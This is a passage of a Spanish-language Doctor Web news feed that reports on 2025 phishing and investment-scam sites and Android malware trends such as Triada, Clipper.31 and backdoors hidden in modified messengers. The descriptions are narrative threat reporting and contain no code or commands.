        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/05_fake_steam_login_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Un sitio web falso del servicio Steam visualiza un formulario phishing para introducir el nombre de usuario y la contraseña&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Los usuarios volvieron a afrontar varias variantes de recursos fraudulentos en Internet que ofrecían todo tipo de regalos y bonificaciones, así como la participación en supuestas «promociones ventajosas». Se propagaron los sitios web falsos de marketplaces rusos, en los que los visitantes supuestamente podían participar en sorteos de premios. El «premio» estaba programado de antemano y, para poder «recibirlo», se exigía a la víctima realizar determinados pagos, por ejemplo, en concepto de un supuesto impuesto y, posteriormente, por el envío del producto y su seguro.&lt;br /&gt;
En otras variantes del esquema fraudulento, el producto deseado supuestamente no estaba disponible y se ofrecía en su lugar una compensación económica. Para «recibir» el dinero, el usuario también debía efectuar una serie de pagos, como una tasa, un seguro, etc. En ningún caso la víctima llegaba a recibir premio alguno.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/06_fake_market_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/06_fake_market_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Un ejemplo de un sitio web falso del marketplace que propone participar en un «sorteo de premios»&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Otras variantes de este tipo de esquemas incluían sitios web falsos de empresas de transporte dirigidos a residentes del Reino Unido. En ellos se ofrecía participar en sorteos de tarjetas de transporte, supuestamente vinculadas a un determinado evento y que permitían utilizar gratuitamente el transporte público. Al «ganar el premio», los estafadores pedían a las víctimas que facilitaran sus datos personales y pagaran una pequeña «comisión».&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/07_scam_transportcard_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/07_scam_transportcard_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Un sitio web fraudulento, supuestamente en nombre de una empresa de transporte, ofrece participar en un «sorteo de tarjetas»&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Siguieron siendo relevantes todo tipo de sitios web fraudulentos de temática financiera. Entre los delincuentes volvieron a ser populares los recursos que ofrecían ganar dinero con operaciones en los mercados utilizando sistemas automatizados basados en supuestos algoritmos únicos y tecnologías de inteligencia artificial. Este tipo de sitios se crea con orientación a residentes de numerosos países. En la mayoría de los casos, solicitan datos personales para registrar una «solicitud» o una «cuenta», tras lo cual los estafadores averiguan esta información y la utilizan a su conveniencia. Posteriormente, pueden revender estos datos o continuar atrayendo a la posible víctima a un falso servicio de inversión, exigiendo el ingreso de dinero en una supuesta cuenta de «operaciones».&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/08_scam_appleAI_trade_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/08_scam_appleAI_trade_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Uno de los sitios web fraudulentos que ofrecían acceso a una supuesta «plataforma de inversión» basada en tecnologías de inteligencia artificial afirmaba, de manera engañosa, estar vinculado a la corporación Apple&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Muchos de estos sitios están construidos a partir de plantillas similares en forma de un chat falso con un «asistente virtual» o un «empleado» de una u otra empresa, supuestamente en cuyo nombre los estafadores se dirigen a la posible víctima. Se invita al usuario a responder a una serie de preguntas y, a continuación, a facilitar sus datos personales.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/09_scam_france_ai_trade_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/09_scam_france_ai_trade_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;En uno de los sitios, los delincuentes ofrecían a usuarios de Francia acceder a un supuesto software de trading automatizado inexistente, TraderAI, que supuestamente permitía ganar a partir de 3 500€&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Uno de los recursos promocionaba un servicio de inversión supuestamente basado directamente en el messenger Telegram. El sitio prometía ingresos de 10.000 € al mes mediante la compraventa automática de acciones de empresas internacionales «directamente desde el navegador del teléfono».&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/10_scam_telegram_platform_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/10_scam_telegram_platform_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;El sitio web fraudulento invita a unirse a una supuesta «plataforma Telegram», que supuestamente opera de forma autónoma en el mercado de acciones&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Los delincuentes también ofrecían a las posibles víctimas ganar dinero mediante «bots de trading», supuestamente creados con la participación de grandes empresas y servicios como Telegram, WhatsApp, TikTok y otros.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/11_scam_whatsap_bot_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/11_scam_whatsap_bot_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Un ejemplo de un sitio web que proponía usar un bot de trading no existente que supuestamente tenía que ver con el messenger WhatsApp&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;A lo largo de 2025, nuestros analistas de Internet detectaron nuevos sitios web fraudulentos que ofrecían invertir en el sector del petróleo y el gas a usuarios de varios países, incluidos Rusia, los países de la CEI y Europa. En este tipo de sitios, en la mayoría de los casos, también se solicita a las posibles víctimas la información personal, como el nombre y los apellidos, el número de teléfono móvil, la dirección de correo electrónico, etc.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/12_scam_kyrgyzgaz_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/12_scam_kyrgyzgaz_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Un sitio web fraudulento, dirigido a ciudadanos de Kirguistán, les ofrece «ganar dinero con el petróleo y el gas», prometiendo elevados ingresos&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Volvieron a aparecer los sitios web fraudulentos que ofrecían obtener «ayudas estatales» en forma de pagos o compensaciones. Por ejemplo, en el segmento ruso de Internet se difundieron los recursos fraudulentos que supuestamente estaban relacionados con el portal Gosuslugi.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/13_scam_fakegosuslugi_viplati_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/13_scam_fakegosuslugi_viplati_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Un ejemplo de un sitio web fraudulento que supuestamente estaba vinculado al servicio Gosuslugi y prometía a los usuarios rusos pagos regulares por parte del Estado y de una gran empresa del sector del petróleo y el gas. Para «participar» en el programa de pagos, se solicitaban a la víctima sus datos personales&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Nuestros expertos también destacaron la aparición de nuevos sitios web falsos de proyectos educativos. En ellos se ofrecía a los usuarios realizar diversos cursos de formación para mejorar su educación financiera, aprender una u otra profesión, etc. Para obtener «acceso» a la formación, a las posibles víctimas, al igual que en muchos otros esquemas similares, también se les solicitaba la información personal.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/14_scam_study_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/14_scam_study_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Un sitio web fraudulento proponía aprender inglés&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Los analistas de Internet de Doctor Web detectaron nuevos sitios web fraudulentos dedicados a la venta de entradas de teatro. En estos recursos, los estafadores ofrecen a las posibles víctimas adquirir entradas a precios atractivos, pero una vez realizado el «pago» los usuarios no las reciben.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/15_fake_bilet_theater_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/15_fake_bilet_theater_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Un ejemplo de un sitio web fraudulento que vendía entradas de teatro no existentes&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Además, también se difundieron nuevos sitios web falsos de cines privados. Al igual que en el caso de las entradas de teatro, los estafadores ofrecen a las posibles víctimas comprar entradas de cine, pero al final estas solo entregan su dinero a los delincuentes.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/16_fake_cinema_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/16_fake_cinema_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Un sitio web falso de un cine privado&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;Para dispositivos móviles&lt;/h3&gt;

&lt;p&gt;Согласно статистике детектирований Dr.Web Security Space для мобильных устройств, в 2025 году пользовател y Android чаще всего сталкивались с рекламным y троянам y &lt;a href="https://vms.dr-web.es/search/?q=Android.MobiDash&amp;lng=es"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; y &lt;a href="https://vms.dr-web.es/search/?q=Android.HiddenAds&amp;lng=es"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;, así como  el malware &lt;a href="https://vms.dr-web.es/search/?q=Android.FakeApp&amp;lng=es"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, que en vez de la funcionalidad declarada puede cargar varios sitios web, así mismo, los fraudulentos y maliciosos. Se destacó un crecimiento de actividad de aplicaciones troyanas &lt;a href="https://vms.dr-web.es/search/?q=Android.Triada&amp;lng=es"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt;. Son amenazas multifuncionales que los malintencionados incrustan en el firmware de dispositivos en Android. Además, se observó un crecimiento del número de ataques de troyanos bancarios &lt;a href="https://vms.dr-web.es/search/?q=Android.Banker&amp;lng=es"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;. Al mismo tiempo la actividad de los bankers &lt;b&gt;Android.SpyMax&lt;/b&gt;, al contrario, bajó.&lt;/p&gt;

&lt;p&gt;El año pasado los creadores de virus siguieron usando varias técnicas de protección de malware para el SO Android. Una de ellas fue el método de conversión del código DEX al código C (conocido como DCC o DEX to C).&lt;/p&gt;

&lt;p&gt;Las aplicaciones no deseadas más populares fueron los programas &lt;a href="https://vms.dr-web.es/search/?q=Program.FakeMoney&amp;lng=es"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;. Ofrecen a los usuarios realizar varias tareas a cambio de recompensas virtuales y prometen la posibilidad de convertir dichas recompensas en dinero real. Sin embargo, en realidad no existe tal posibilidad. Además, en los dispositivos protegidos se detectaban con frecuencia las aplicaciones &lt;a href="https://vms.dr-web.es/search/?q=Program.FakeAntiVirus&amp;lng=es"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt; y &lt;a href="https://vms.dr-web.es/search/?q=Program.CloudInject&amp;lng=es"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;. Los primeros imitan el funcionamiento de los antivirus y detectan amenazas inexistentes, ofreciendo «eliminar» la infección mediante la compra de la versión completa del software. Los segundos son aplicaciones que han sido modificadas a través de un popular servicio en la nube. Durante la modificación, se les añaden permisos de sistema peligrosos y código ofuscado, cuya finalidad no puede controlarse.&lt;br /&gt;
Los programas modificados mediante la utilidad NP Manager (detectados como &lt;b&gt;Tool.NPMod&lt;/b&gt;) se convirtieron en el software potencialmente peligroso más popular. Esta utilidad ofusca el código de las aplicaciones modificadas y permite esquivar la verificación de su firma digital. El tipo de adware más activo en 2025 fueron las modificaciones no oficiales de WhatsApp (&lt;a href="https://vms.dr-web.es/search/?q=Adware.ModAd&amp;lng=es"&gt;&lt;b&gt;Adware.ModAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;), que abren automáticamente los enlaces publicitarios durante el uso del messenger.&lt;/p&gt;

&lt;p&gt;En el año 2025 se detectaron nuevos casos de infección del firmware de dispositivos en Android. Nuestra empresa informó de uno de ellos en abril. Los malintencionados preinstalaron el malware &lt;a href="https://vms.dr-web.es/search/?q=Android.Clipper.31&amp;lng=es"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; en el área de sistema de algunos modeles de smartphones económicos y con el mismo robaban la criptomoneda de los usuarios. Otros atacantes consiguieron implementar los troyanos peligrosos &lt;a href="https://vms.dr-web.es/search/?q=Android.Triada&amp;lng=es"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt; en el firmware de otros modelos de smartphones en Android. Además, se registraron más casos de infección del firmware de consolas TV en Android con nuevas versiones del troyano &lt;a href="https://vms.dr-web.es/search/?q=Android.Vo1d&amp;lng=es"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt;, &lt;a href="https://news.dr-web.es/show/?i=14900&amp;lng=es" target="_blank"&gt;detectado&lt;/a&gt; por nuestra empresa en el año 2024.&lt;/p&gt;

&lt;p&gt;Durante el año pasado el laboratorio antivirus de Doctor Web detectó algunos tipos de malware peligroso. En abril informamos sobre el troyano &lt;a href="https://vms.dr-web.es/search/?q=Android.Spy.1292.origin&amp;lng=es"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt;, que se ocultaba en una versión modificada por los creadores de malware de la aplicación cartográfica Alpine Quest y atacaba a militares rusos. &lt;a href="https://vms.dr-web.es/search/?q=Android.Spy.1292.origin&amp;lng=es"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt; transfería a los delincuentes los datos sobre el número de teléfono móvil y las cuentas del usuario, recopilaba los contactos de la agenda, la geolocalización del dispositivo infectado y la información sobre los archivos almacenados en él. También podía robar determinados archivos por orden de los atacantes. Estos se interesaban principalmente por documentos confidenciales transmitidos a través de messengers, así como por el archivo del registro de ubicaciones de la aplicación cartográfica Alpine Quest.&lt;/p&gt;

&lt;p&gt;En agosto nuestros expertos advirtieron del backdoor &lt;a href="https://vms.dr-web.es/search/?q=Android.Backdoor.916.origin&amp;lng=es"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; propagado por los malintencionados camuflado como un antivirus, a través de los mensajes personales en messengers. &lt;a href="https://vms.dr-web.es/search/?q=Android.Backdoor.916.origin&amp;lng=es"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; roba la información privada y permite supervisar a los usuarios. El objetivo principal de este backdoor fueron los empleados de negocios rusos.&lt;/p&gt;

&lt;p&gt;En octubre informamos sobre el backdoor multifuncional &lt;a href="https://vms.dr-web.es/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=es"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, detectado por nuestros analistas de virus en las versiones modificadas del messenger Telegram X. Este malware también se usa para robar los datos privados, incluidos los nombres de usuario y contraseñas de Telegram, los SMS entrantes, la mensajería en Messenger y los datos del portapapeles. Así mismo, el backdoor permite a los malintencionados administrar el Messenger totalmente y controlar la cuenta hackeada de Telegram de la víctima. Para administrar el backdoor los ciberdelincuentes usaron tanto el servidor C2 como la base de datos Redis, lo cual no se detectaba anteriormente en amenazas en Android. &lt;a href="https://vms.dr-web.es/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=es"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; fue destinado sobre todo a los residentes de Indonesia y Brasil.&lt;/p&gt;

&lt;p&gt;Para más información sobre los eventos de virus para dispositivos móviles en el año 2025 consulte nuestro &lt;a href="https://news.dr-web.es/show/?i=15104" target="_blank"&gt;informe&lt;/a&gt;.&lt;/p&gt;

&lt;h3&gt;Perspectivas y probables tendencias&lt;/h3&gt;

&lt;p&gt;En el nuevo año 2026, una de las amenazas más populares para los usuarios probablemente seguirá siendo la de los troyanos publicitarios, mediante los cuales los delincuentes obtienen ingresos ilícitos. Es previsible que los ciberdelincuentes recurran con mayor frecuencia a aplicaciones troyanas bancarias, que también les permiten lucrarse.&lt;br /&gt;
Es posible que continúe aumentando la popularidad de varias herramientas y métodos destinados a ocultar la actividad maliciosa. Entre ellos cabe destacar el uso de empaquetadores y ofuscadores, la utilización de malware tipo dropper y de cargadores multietapa, así como el empleo de esteganografía para ocultar la carga maliciosa. Además, en la creación de software malicioso, los ciberdelincuentes —incluidos aquellos con poca experiencia en programación— recurrirán cada vez más a asistentes basados en inteligencia artificial. Como resultado, surgirán nuevas familias de malware y el número de amenazas aumentará.&lt;br /&gt;
Los organismos públicos y las estructuras corporativas volverán a estar en el punto de mira, lo que dará lugar a nuevos ataques dirigidos. También son probables nuevos casos de infección del firmware de smartphones Android, decodificadores de TV y otros tipos de dispositivos móviles, especialmente en el segmento de bajo coste. La actividad de los estafadores en Internet se mantendrá.&lt;/p&gt;</description></item><item><guid>https://news.dr-web.es/show/?i=15104&amp;lng=es</guid><title>Doctor Web: informe de la actividad de virus para dispositivos móviles en el año 2025</title><link>https://news.dr-web.es/show/?i=15104&amp;lng=es&amp;c=5</link><pubDate>Thu, 15 Jan 2026 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;15 de enero de 2026&lt;/b&gt;&lt;/p&gt;

&lt;h3&gt;Lo más destacado&lt;/h3&gt;

&lt;p&gt;&lt;newslead&gt;En 2025, los usuarios de dispositivos Android se enfrentaron con mayor frecuencia a troyanos publicitarios, así como a programas falsos utilizados con fines fraudulentos. &lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;El software no deseado más popular, al igual que el año anterior, fueron aplicaciones que, en forma de juego, proponen realizar determinadas tareas a cambio de recompensas virtuales. Estas prometen la posibilidad de convertir dichas recompensas en dinero real, pero en realidad esa opción no está prevista en los programas.&lt;/p&gt;

&lt;p&gt;Entre el software potencialmente peligroso, la mayor actividad se observó en aplicaciones que habían sido modificadas mediante la utilidad NP Manager. Esta ofusca y protege el código de los programas modificados frente al análisis y la detección, y además permite eludir la verificación de la firma digital tras su modificación. Los programas publicitarios detectados con mayor frecuencia fueron modificaciones no oficiales del messenger WhatsApp, que abren automáticamente enlaces publicitarios durante el uso de la aplicación.&lt;/p&gt;

&lt;p&gt;Durante el pasado año también se registraron nuevos casos de introducción de malware en el firmware de distintos modelos de dispositivos Android. Sobre uno de ellos informamos en la primavera de 2025. Los ciberdelincuentes lograron preinstalar el troyano &lt;a href="https://vms.dr-web.es/search/?q=Android.Clipper.31&amp;lng=es"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; en varios modelos económicos de smartphones y, con su ayuda, robar criptomonedas a las víctimas.&lt;/p&gt;

&lt;p&gt;Asimismo, en primavera nuestros especialistas detectaron el troyano &lt;a href="https://vms.dr-web.es/search/?q=Android.Spy.1292.origin&amp;lng=es"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt;, que los creadores de malware habían integrado en una de las versiones modificadas del software cartográfico Alpine Quest. La aplicación maliciosa estaba dirigida contra militares rusos y se utilizaba con fines de ciberespionaje.&lt;/p&gt;

&lt;p&gt;A finales del verano, el laboratorio antivirus de Doctor Web informó sobre el backdoor &lt;a href="https://vms.dr-web.es/search/?q=Android.Backdoor.916.origin&amp;lng=es"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt;, que se propagaba a través de mensajeros populares. Los delincuentes lo empleaban para vigilar a empleados de empresas rusas y recopilar información confidencial.&lt;/p&gt;

&lt;p&gt;Ya en otoño, informamos sobre el peligroso backdoor &lt;a href="https://vms.dr-web.es/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=es"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, que los ciberdelincuentes habían integrado en modificaciones del messenger Telegram X. Este malware permitía comprometer las cuentas de Telegram de las víctimas y controlar el propio messenger en nombre de los usuarios.&lt;/p&gt;

&lt;p&gt;En los últimos 12 meses, el laboratorio antivirus de Doctor Web detectó en el catálogo de Google Play más de 180 amenazas, que en conjunto fueron descargadas más de 2.165.000 veces. Entre ellas había diversas variantes de troyanos que suscriben a los usuarios a servicios de pago, programas falsos utilizados con fines fraudulentos, así como nuevo software publicitario y no deseado.&lt;/p&gt;

&lt;p&gt;En 2025, los creadores de malware continuaron utilizando distintas técnicas destinadas a dificultar el análisis del malware para Android y a esquivar su detección por parte de los antivirus. Uno de los métodos más populares fue la conversión de código DEX a código C. Además, nuestros analistas de malware señalaron que, en la creación de malware, los delincuentes recurren a asistentes basados en inteligencia artificial que les ayudan a escribir código.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;TENDENCIAS DEL AÑO PASADO&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Los troyanos publicitarios otra vez se convirtieron en amenazas en Android más populares&lt;/li&gt;
        &lt;li&gt;Creció la popularidad de la utilidad NP Manager que ofusca el código de las aplicaciones en Android modificadas y permite esquivar la verificación de su firma digital una vez modificadas&lt;/li&gt;
        &lt;li&gt;Creció la actividad de los troyanos bancarios&lt;/li&gt;
        &lt;li&gt;Se detectaron los nuevos casos de infección del malware de dispositivos en Android&lt;/li&gt;
        &lt;li&gt;Los ciberdelincuentes siguieron usando tanto las técnicas ya conocidas para la protección de malware contra la detección y análisis, como los nuevos trucos&lt;/li&gt;
        &lt;li&gt;Los creadores de virus aplicaron activamente los asistentes de IA para crear el código del malware&lt;/li&gt;
        &lt;li&gt;Aparición de las nuevas amenazas en el catálogo Google Play&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;Los eventos más destacados del año 2025&lt;/h3&gt;

&lt;p&gt;En abril del año pasado, los expertos de Doctor Web &lt;a href="https://news.dr-web.es/show/?i=15002" target="_blank"&gt;detectaron&lt;/a&gt; una campaña a gran escala de robo de criptomonedas dirigida a propietarios de dispositivos Android. Los delincuentes obtuvieron acceso a la cadena de suministro de varios fabricantes chinos e introdujeron el troyano  &lt;a href="https://vms.dr-web.es/search/?q=Android.Clipper.31&amp;lng=es"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; en el firmware de varios modelos económicos de smartphones. Los creadores de malware lo integraron en una versión modificada del messenger WhatsApp. Para la modificación se utilizó la herramienta &lt;a href="https://github.com/LSPosed/LSPatch" target="_blank"&gt;LSPatch&lt;/a&gt;, que permite cambiar la lógica de funcionamiento de las aplicaciones sin modificar su código.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.dr-web.es/search/?q=Android.Clipper.31&amp;lng=es"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; intercepta los mensajes enviados y recibidos en el messenger, busca en ellos las direcciones de monederos de criptomonedas Tron y Ethereum y las sustituye por direcciones que pertenecen a los atacantes. Al mismo tiempo, el troyano oculta la sustitución y en esos mensajes las víctimas ven las direcciones de monederos aparentemente correctas. &lt;a href="https://vms.dr-web.es/search/?q=Android.Clipper.31&amp;lng=es"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; también envía a los delincuentes todas las imágenes en formatos &lt;em&gt;jpg&lt;/em&gt;, &lt;em&gt;png&lt;/em&gt; y &lt;em&gt;jpeg&lt;/em&gt; para buscar en ellas frases mnemotécnicas guardadas que permiten acceder a monederos de criptomonedas. Los ciberdelincuentes integraron &lt;a href="https://vms.dr-web.es/search/?q=Android.Clipper.31&amp;lng=es"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; en decenas de otras aplicaciones, entre ellas populares apps de monederos de criptomonedas, escáneres de códigos QR y otros messengers, incluido Telegram. Estas modificaciones se distribuían a través de sitios web maliciosos.&lt;/p&gt;

&lt;p&gt;En 2025 también se registraron otros casos de infiltración de malware en el área del sistema de dispositivos Android. Por ejemplo, otro grupo de atacantes logró introducir nuevas versiones de troyanos peligrosos &lt;a href="https://vms.dr-web.es/search/?q=Android.Triada&amp;lng=es"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt; en el firmware de varios smartphones de bajo coste. El peligro de los malware Triada radica en su capacidad para infectar el proceso del sistema Zygote, que participa directamente en el inicio de todas las aplicaciones. Como consecuencia, los troyanos Triada pueden integrarse posteriormente en cualquier aplicación del dispositivo, obteniendo de facto un control total sobre ella. Los delincuentes utilizan estos troyanos para descargar e instalar otro malware, así como aplicaciones no deseadas y publicitarias. Además, con su ayuda pueden espiar a las víctimas, suscribirlas a servicios de pago, etc.&lt;/p&gt; 

&lt;p&gt;Asimismo, se detectaron nuevos casos de infección del firmware de decodificadores de TV basados en Android con nuevas versiones del troyano &lt;a href="https://vms.dr-web.es/search/?q=Android.Vo1d&amp;lng=es"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt;, descubierto por nuestra empresa en 2024. Vo1d es un backdoor que coloca sus componentes en el área del sistema de los dispositivos infectados y, por orden de los atacantes, puede descargar e instalar software de terceros de forma no autorizada.&lt;/p&gt;

&lt;p&gt;Asimismo, en abril nuestro laboratorio antivirus de Doctor Web &lt;a href="https://news.dr-web.es/show/?i=15006" target="_blank"&gt;registró&lt;/a&gt; una campaña de propagación del troyano espía &lt;a href="https://vms.dr-web.es/search/?q=Android.Spy.1292.origin&amp;lng=es"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt;, dirigida contra militares rusos. Los delincuentes integraron el malware en una de las versiones del software cartográfico Alpine Quest y propagaron la modificación a través de un canal de Telegram creado por ellos y presentado como oficial, así como mediante uno de los catálogos rusos de aplicaciones en Android.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/01_Android.Spy.1292.origin_tg_group_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/01_Android.Spy.1292.origin_tg_group_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Un canal de Telegram a través del cual los malintencionados propagaron la modificación maliciosa de Alpine Quest que contiene &lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.dr-web.es/search/?q=Android.Spy.1292.origin&amp;lng=es"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt; transfería a los ciberdelincuentes los datos sobre las cuentas de los usuarios y el número de teléfono móvil, los contactos de la agenda, la geolocalización del dispositivo y la información sobre los archivos almacenados en él. El troyano podía robar algunos archivos por orden de los atacantes. A estos les interesaban principalmente documentos confidenciales que los usuarios enviaban a través de messengers populares, así como el archivo del registro de ubicaciones de la aplicación Alpine Quest.&lt;/p&gt;

&lt;p&gt;En agosto &lt;a href="https://news.dr-web.es/show/?i=15047" target="_blank"&gt;informamos&lt;/a&gt; sobre casos de propagación del backdoor &lt;a href="https://vms.dr-web.es/search/?q=Android.Backdoor.916.origin&amp;lng=es"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; a través de mensajes privados en messengers populares. Los atacantes ofrecían a las posibles víctimas instalar un «antivirus» desde un archivo APK adjunto a los mensajes, en el que en realidad se ocultaba el malware. Nuestro laboratorio antivirus detectó las primeras versiones de &lt;a href="https://vms.dr-web.es/search/?q=Android.Backdoor.916.origin&amp;lng=es"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; en enero de 2025 y, desde el momento de su descubrimiento, realizó un seguimiento de su actividad, lo que permitió identificar esta campaña con rapidez.&lt;/p&gt;

&lt;div class="img img-two-v same-height mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_mobile/02_Android.Backdoor.916.origin_2025.png" data-fancybox&gt;
